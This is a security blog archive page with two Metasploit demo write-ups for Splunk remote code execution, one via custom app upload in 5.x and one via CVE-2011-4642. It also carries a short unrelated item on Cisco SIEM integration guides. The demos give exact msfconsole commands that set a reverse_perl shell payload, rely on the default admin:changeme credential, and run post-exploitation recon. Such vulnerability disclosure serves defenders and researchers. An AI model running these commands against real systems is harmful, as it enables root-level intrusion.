Tag Archives: Splunk

Splunk 5.0 Custom App Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Marc Wickenden
Vulnerability details provided by Marc Wickenden the 2012-11-12
Metasploit PoC provided by Marc Wickenden the 2012-11-14

PoC provided by :

@marcwickenden
sinn3r
juan vazquez

Reference(s) :

Splunk: With Great Power Comes Great Responsibility
Abusing Splunk Functionality with Metasploit

Affected version(s) :

All Splunk 5.x versions

Tested on Centos 5.8 x86 with :

Splunk version 5.0.1, build 143156

Description :

This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the script search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of admin:changeme, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has only been tested successfully against Splunk 5.0.

Commands :

use exploit/multi/http/splunk_upload_app_exec
set RHOST 192.168.178.34
set TARGET 0
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.26
exploit

ifconfig
id
uname -a
ps

CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability the 2011-12-12
Metasploit PoC provided the 2011-12-22

PoC provided by :

Gary O’Leary-Steele
juan vazquez

Reference(s) :

CVE-2011-4642
OSVDB-77695
SPL-45172

Affected version(s) :

Splunk 4.2 to 4.2.4

Tested on Ubuntu 10.04.3 LTS with :

Splunk 4.2.4

Description :

This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.

Commands :

use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a

Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration

Cisco provide some useful Smart Business Architecture (SBA) guides for SIEM solutions integration how will helps you to design and deploy best practices that include Cisco switching, routing, security and wireless technologies.

Actually the SBA guides are covering the following solutions :

  • SBA guide how provides a general overview of SIEM technology, as well as best practices, use cases, and deployment considerations for using a SIEM with Cisco infrastructure (click here to read). Cisco products logging retrieval methods,
  • SBA guide for ArcSight SIEM plateform (ESM, Logger, Express, SmartConnectors and Content Pack) integration (click here to read).
  • SBA guide for Loglogic MX Series SIEM product integration (click here to read).
  • SBA guide for netForensics nFX Cinxi One SIEM product integration (click here to read).
  • SBA guide for RSA enVision SIEM product integration (click here to read).
  • SBA guide for Splunk security management solution (click here to read).